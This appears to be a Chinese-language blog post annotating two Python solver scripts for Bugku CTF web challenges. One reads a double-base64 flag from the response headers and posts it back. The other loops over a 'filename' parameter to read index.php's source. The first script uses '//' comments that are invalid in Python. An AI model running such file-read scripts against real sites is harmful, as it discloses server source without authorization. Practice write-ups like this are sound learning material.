bugku题中的python脚本解释
bugku-速度要快
#-*- coding:utf-8-*-
import requests //get,post方法
import base64 //base64加解密模块
url="http://xxx.ddd.dg:8002/web6/"
r=requests.session() //创建session
headers=r.get(url).headers //用get方式获取url的headers信息,因为flag在headers
mid=base64.b64decode(headers['flag']) //将headers中的flag用base64解码,解码后的类型为bytes
mid=mid.decode() //以字符串编码(默认)的方法解码字符串,
flag=base64.b64decode(mid.split(':')[1])//选用的密文是加密了两次,第一次解密后的密文格式是flag:xxx,所以获取的是:后的值,[1]表示选取第2个分片(从0开始)
data={'margin':flag} //这个是传值给margin
print(r.post(url,data).text)//post方法传上去
————————————————————————————————————————————————————————————————
bugku-cookie欺骗
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Date : 2017-10-28 09:36:41
# @Author : csu_vc
# @Link : http://blog.csdn.net/csu_vc
import requests
s=requests.Session()
url='http://123.206.87.240:8002/web11/index.php'
for i in range(1,20): #在范围1到20内遍历
# payload={'line':str(i),'filename':'aW5kZXgucGhw'}
# a=s.get(url,params=payload ).content #可以用这种表示发法
a=s.get(url,params={'line':str(i),'filename':'aW5kZXgucGhw'}).content #也可以用这种表示方法,content
content=str(a,encoding="utf-8")
#print(content)
f = open("model_Weight1.txt",'a')
f.write(content)
f.write('\n')